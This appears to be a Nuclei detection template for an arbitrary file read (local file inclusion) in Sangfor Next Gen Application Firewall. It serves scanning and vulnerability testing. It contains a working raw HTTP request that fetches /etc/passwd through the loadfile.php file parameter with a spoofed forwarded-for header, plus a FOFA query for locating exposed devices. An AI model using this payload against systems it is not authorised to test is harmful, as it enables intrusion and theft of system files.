Description
Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
id: sangfor-nextgen-lfi
info:
name: Sangfor Next Gen Application Firewall - Arbitary File Read
author: DhiyaneshDk
severity: high
description: |
Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
reference:
- https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/
classification:
cpe: cpe:2.3:a:sangfor:next-gen_application_firewall:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: sangfor
product: next-gen_application_firewall
fofa-query: title="SANGFOR | NGAF"
tags: sangfor,lfi,vuln
http:
- raw:
- |
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: {{Hostname}}
y-forwarded-for: 127.0.0.1
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"
- type: word
part: header
words:
- 'filename="passwd"'
- 'application/octet-stream'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204413515627824bb4032b1ee77a78a3d6758e78b56e619e7408ce4486d7013a0202200e02f7872f2e3a3e4a1ac4c678f56ba41bfd18c50ad2c9af543ef89f470f91b2:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.